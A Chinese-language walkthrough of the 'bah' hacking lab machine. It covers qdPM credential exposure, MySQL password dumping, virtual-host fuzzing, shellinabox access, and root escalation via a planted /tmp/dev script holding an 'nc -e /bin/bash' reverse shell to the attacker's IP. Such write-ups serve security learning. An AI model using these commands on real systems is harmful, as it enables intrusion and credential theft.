AI 助理
备案控制台
开发者社区 数据库 文章 正文

bah-host碰撞-pspy+sheallinabox

2024-10-10 6
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: bah-host碰撞-pspy+sheallinabox
bah easy qdpmcms利用、mysql利用、host碰撞、shellinaboxd使用、pspy分析隐藏进程提权

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth0 -r 192.168.44.141/24
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A -T 4 -p- 192.168.44.141

80 3306

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.44.141/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt,png -e

访问80发现是qdPMcms的网站,直接searchsploit

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ searchsploit qdPM 
qdPM 9.2 - Cross-site Request Forgery (CSR | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthentica | php/webapps/50176.txt

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ searchsploit -m php/webapps/50176.txt

https://www.exploit-db.com/exploits/50176
http://<website>/core/config/databases.yml

下载得到数据库的用户密码http://192.168.44.141/core/config/databases.yml

all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qpm;host=localhost'
      profiler: false
      username: qpmadmin
      password: "<?php echo urlencode('qpmpazzw') ; ?>"
      attributes:
        quote_identifier: true

重新安装漏洞http://192.168.44.141/install

但是登陆时候确是404http://192.168.44.141/index.php/login

想到刚开开启的3306端口可以登录数据库

                                                                             
┌──(kali㉿kali)-[~]
└─$ mysql -uqpmadmin -pqpmpazzw -h192.168.44.141     
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 58
Server version: 10.5.11-MariaDB-1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| hidden             |
| information_schema |
| mysql              |
| performance_schema |
| qpm                |
+--------------------+
5 rows in set (0.003 sec)

MariaDB [(none)]> use hidden
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

MariaDB [hidden]> show tables;
+------------------+
| Tables_in_hidden |
+------------------+
| url              |
| users            |
+------------------+
2 rows in set (0.002 sec)

MariaDB [hidden]> select * from users;
+----+---------+---------------------+
| id | user    | password            |
+----+---------+---------------------+
|  1 | jwick   | Ihaveafuckingpencil |
|  2 | rocio   | Ihaveaflower        |
|  3 | luna    | Ihavealover         |
|  4 | ellie   | Ihaveapassword      |
|  5 | camila  | Ihaveacar           |
|  6 | mia     | IhaveNOTHING        |
|  7 | noa     | Ihaveflow           |
|  8 | nova    | Ihavevodka          |
|  9 | violeta | Ihaveroot           |
+----+---------+---------------------+
9 rows in set (0.002 sec)

MariaDB [hidden]> select * from url;
+----+-------------------------+
| id | url                     |
+----+-------------------------+
|  1 | http://portal.bah.hmv   |
|  2 | http://imagine.bah.hmv  |
|  3 | http://ssh.bah.hmv      |
|  4 | http://dev.bah.hmv      |
|  5 | http://party.bah.hmv    |
|  6 | http://ass.bah.hmv      |
|  7 | http://here.bah.hmv     |
|  8 | http://hackme.bah.hmv   |
|  9 | http://telnet.bah.hmv   |
| 10 | http://console.bah.hmv  |
| 11 | http://tmux.bah.hmv     |
| 12 | http://dark.bah.hmv     |
| 13 | http://terminal.bah.hmv |
+----+-------------------------+
13 rows in set (0.002 sec)

MariaDB [hidden]>

host碰撞

使用host碰撞工具获取访问域名,记得在HostCollision-2.2.8/dataSource/下配置好域名和ip

┌──(kali㉿kali)-[~/Desktop/红队工具/HostCollision-2.2.8]
└─$ java -jar HostCollision.jar

或者使用wfuzz 进行碰撞

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ wfuzz -c -w url -u 192.168.44.141 -H "HOST: FUZZ"

000000005:   200        0 L      1 W        46 Ch       "party.bah.hmv - party.bah.hmv"

host绑定后访问这个域名

sudo vim /etc/hosts

使用这个用户密码ssh|  2 | rocio   | Ihaveaflower        |
使用上面的密码获取一个web 版的ssh(shellinabox:一款使用 AJAX 的基于 Web 的终端模拟器)

rocio@bah:~$ cat user.txt                                                    
HdsaMoiuVdsaeqw                                                              

su qpmadmin //qpmpazzw

提权

上传pspy64查看root进程

qpmadmin@bah:~$ wget http://192.168.44.128:1234/pspy64
--2024-04-19 03:13:46--  http://192.168.44.128:1234/pspy64                   
Connecting to 192.168.44.128:1234... connected.                              
HTTP request sent, awaiting response... 200 OK                               
Length: 3104768 (3.0M)                                                       
Saving to: ‘pspy64’                                                          
                                                                             
pspy64              100%[================>]   2.96M  --.-KB/s    in 0.1s     
                                                                             
2024-04-19 03:13:46 (28.6 MB/s) - ‘pspy64’ saved [3104768/3104768]           
                                                                             
qpmadmin@bah:~$ ls                                                           
pspy64                                                                       
qpmadmin@bah:~$ chmod +x pspy64                                              
qpmadmin@bah:~$ ./pspy64                                                     
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
                                                                             
                                                                             
     ██▓███    ██████  ██▓███ ▓██   ██▓                                      
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒                                      
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░                                      
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░                                      
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░                                      
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒                                       
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░                                       
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░                                        
                   ░           ░ ░                                           
                               ░ ░                                           
                                                                             
Config: Printing events (colored=true): processes=true | file-system-events=f
alse ||| Scanning for processes every 100ms and on inotify events ||| Watchin
g directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursi
ve)                                                                          
Draining file system events due to startup...                                
done                                                                         
2024/04/19 03:14:06 CMD: UID=1001  PID=996    | ./pspy64 
2024/04/19 03:14:06 CMD: UID=0     PID=993    | 
2024/04/19 03:14:06 CMD: UID=1001  PID=930    | bash 
2024/04/19 03:14:06 CMD: UID=0     PID=929    | su qpmadmin 
2024/04/19 03:14:06 CMD: UID=1000  PID=910    | -bash 
2024/04/19 03:14:06 CMD: UID=1000  PID=905    | (sd-pam) 
2024/04/19 03:14:06 CMD: UID=1000  PID=903    | /lib/systemd/systemd --user 
2024/04/19 03:14:06 CMD: UID=0     PID=897    | login -p -h 127.0.0.1 
2024/04/19 03:14:06 CMD: UID=0     PID=881    | 
2024/04/19 03:14:06 CMD: UID=0     PID=858    | dhclient ens33 
2024/04/19 03:14:06 CMD: UID=0     PID=854    | 
2024/04/19 03:14:06 CMD: UID=0     PID=659    | dhclient ens33 
2024/04/19 03:14:06 CMD: UID=0     PID=638    | dhclient ens33 
2024/04/19 03:14:06 CMD: UID=0     PID=634    | -bash 
2024/04/19 03:14:06 CMD: UID=0     PID=629    | (sd-pam) 
2024/04/19 03:14:06 CMD: UID=0     PID=628    | /lib/systemd/systemd --user 
2024/04/19 03:14:06 CMD: UID=106   PID=556    | /usr/sbin/mariadbd 
2024/04/19 03:14:06 CMD: UID=33    PID=537    | php-fpm: pool www            
                                                                             
2024/04/19 03:14:06 CMD: UID=33    PID=536    | php-fpm: pool www            
                                                                             
2024/04/19 03:14:06 CMD: UID=33    PID=530    | nginx: worker process        
                                                                             
2024/04/19 03:14:06 CMD: UID=0     PID=524    | nginx: master process /usr/sb
in/nginx -g daemon on; master_process on;                                    
2024/04/19 03:14:06 CMD: UID=107   PID=513    | /usr/bin/shellinaboxd -q --ba
ckground=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellin
abox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabl
ed/00+Black on White.css,White On Black:-/etc/shellinabox/options-enabled/00_
White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color 
Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css -
-no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/
dev                                                                          
2024/04/19 03:14:06 CMD: UID=107   PID=511    | /usr/bin/shellinaboxd -q --ba
ckground=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellin
abox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabl
ed/00+Black on White.css,White On Black:-/etc/shellinabox/options-enabled/00_
White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color 
Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css -
-no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/
dev                                                                          
2024/04/19 03:14:06 CMD: UID=0     PID=472    | 
2024/04/19 03:14:06 CMD: UID=0     PID=468    | /bin/login -p --      
2024/04/19 03:14:06 CMD: UID=0     PID=448    | /lib/systemd/systemd-logind 
2024/04/19 03:14:06 CMD: UID=0     PID=443    | /usr/sbin/rsyslogd -n -iNONE 
2024/04/19 03:14:06 CMD: UID=0     PID=440    | php-fpm: master process (/etc
/php/7.4/fpm/php-fpm.conf)                                                   
2024/04/19 03:14:06 CMD: UID=104   PID=430    | /usr/bin/dbus-daemon --system
 --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only  
2024/04/19 03:14:06 CMD: UID=0     PID=429    | /usr/sbin/cron -f 
2024/04/19 03:14:06 CMD: UID=101   PID=401    | /lib/systemd/systemd-timesync
d                                                                            
2024/04/19 03:14:06 CMD: UID=0     PID=384    |

这里可以看到一个shellinaboxd的命令。 -s 是用于启动服务。程序中的/devel将由用户root调用目标机器的/tmp/dev。因此,我们可以在 /tmp 上创建一个名为“dev”的可执行脚本,这将为我们提供一个反向 shell。

qpmadmin@bah:/tmp$ nano dev                                                                                                                                      
qpmadmin@bah:/tmp$ cat dev                                                                
#!/bin/bash                                                 
nc -e /bin/bash 192.168.44.128 9001                                                                                                                              
qpmadmin@bah:/tmp$ chmod +x dev


文章标签:
数据库
Shell
关系型数据库
MySQL
安全
是乙太呀
目录
相关文章
弹性计算-百晓生
|
22天前
|
弹性计算 人工智能 架构师
阿里云携手Altair共拓云上工业仿真新机遇
2024年9月12日,「2024 Altair 技术大会杭州站」成功召开,阿里云弹性计算产品运营与生态负责人何川,与Altair中国技术总监赵阳在会上联合发布了最新的“云上CAE一体机”。
弹性计算-百晓生
82278 20
阿里云携手Altair共拓云上工业仿真新机遇
Ganos全空间数据库
|
15天前
|
存储 关系型数据库 分布式数据库
GraphRAG:基于PolarDB+通义千问+LangChain的知识图谱+大模型最佳实践
本文介绍了如何使用PolarDB、通义千问和LangChain搭建GraphRAG系统,结合知识图谱和向量检索提升问答质量。通过实例展示了单独使用向量检索和图检索的局限性,并通过图+向量联合搜索增强了问答准确性。PolarDB支持AGE图引擎和pgvector插件,实现图数据和向量数据的统一存储与检索,提升了RAG系统的性能和效果。
Ganos全空间数据库
1083 50
BetterBench
|
19天前
|
机器学习/深度学习 算法 大数据
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
2024“华为杯”数学建模竞赛,对ABCDEF每个题进行详细的分析,涵盖风电场功率优化、WLAN网络吞吐量、磁性元件损耗建模、地理环境问题、高速公路应急车道启用和X射线脉冲星建模等多领域问题,解析了问题类型、专业和技能的需要。
BetterBench
2570 22
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
阿里云云原生
|
17天前
|
人工智能 IDE 程序员
期盼已久!通义灵码 AI 程序员开启邀测,全流程开发仅用几分钟
在云栖大会上,阿里云云原生应用平台负责人丁宇宣布,「通义灵码」完成全面升级,并正式发布 AI 程序员。
阿里云云原生
1170 1
瓴羊Dataphin
|
1天前
|
存储 人工智能 搜索推荐
数据治理,是时候打破刻板印象了
瓴羊智能数据建设与治理产品Datapin全面升级,可演进扩展的数据架构体系为企业数据治理预留发展空间,推出敏捷版用以解决企业数据量不大但需构建数据的场景问题,基于大模型打造的DataAgent更是为企业用好数据资产提供了便利。
瓴羊Dataphin
152 2
BetterBench
|
19天前
|
机器学习/深度学习 算法 数据可视化
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
2024年中国研究生数学建模竞赛C题聚焦磁性元件磁芯损耗建模。题目背景介绍了电能变换技术的发展与应用,强调磁性元件在功率变换器中的重要性。磁芯损耗受多种因素影响,现有模型难以精确预测。题目要求通过数据分析建立高精度磁芯损耗模型。具体任务包括励磁波形分类、修正斯坦麦茨方程、分析影响因素、构建预测模型及优化设计条件。涉及数据预处理、特征提取、机器学习及优化算法等技术。适合电气、材料、计算机等多个专业学生参与。
BetterBench
1566 16
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
大模型服务小助手
|
2天前
|
JSON 自然语言处理 数据管理
阿里云百炼产品月刊【2024年9月】
阿里云百炼产品月刊【2024年9月】,涵盖本月产品和功能发布、活动,应用实践等内容,帮助您快速了解阿里云百炼产品的最新动态。
大模型服务小助手
193 6
阿里云百炼产品月刊【2024年9月】
阿里云新鲜事
|
21天前
|
编解码 JSON 自然语言处理
通义千问重磅开源Qwen2.5,性能超越Llama
击败Meta,阿里Qwen2.5再登全球开源大模型王座
阿里云新鲜事
920 14
中间件小哥
|
16天前
|
人工智能 开发框架 Java
重磅发布!AI 驱动的 Java 开发框架:Spring AI Alibaba
随着生成式 AI 的快速发展,基于 AI 开发框架构建 AI 应用的诉求迅速增长,涌现出了包括 LangChain、LlamaIndex 等开发框架,但大部分框架只提供了 Python 语言的实现。但这些开发框架对于国内习惯了 Spring 开发范式的 Java 开发者而言,并非十分友好和丝滑。因此,我们基于 Spring AI 发布并快速演进 Spring AI Alibaba,通过提供一种方便的 API 抽象,帮助 Java 开发者简化 AI 应用的开发。同时,提供了完整的开源配套,包括可观测、网关、消息队列、配置中心等。
中间件小哥
684 9
阿里云专家技术服务助手
|
15天前
|
存储 监控 调度
云迁移中心CMH:助力企业高效上云实践全解析
随着云计算的发展,企业上云已成为创新发展的关键。然而,企业上云面临诸多挑战,如复杂的应用依赖梳理、成本效益分析等。阿里云推出的云迁移中心(CMH)旨在解决这些问题,提供自动化的系统调研、规划、迁移和割接等功能,简化上云过程。CMH通过评估、准备、迁移和割接四个阶段,帮助企业高效完成数字化转型。未来,CMH将继续提升智能化水平,支持更多行业和复杂环境,助力企业轻松上云。
阿里云专家技术服务助手
322 20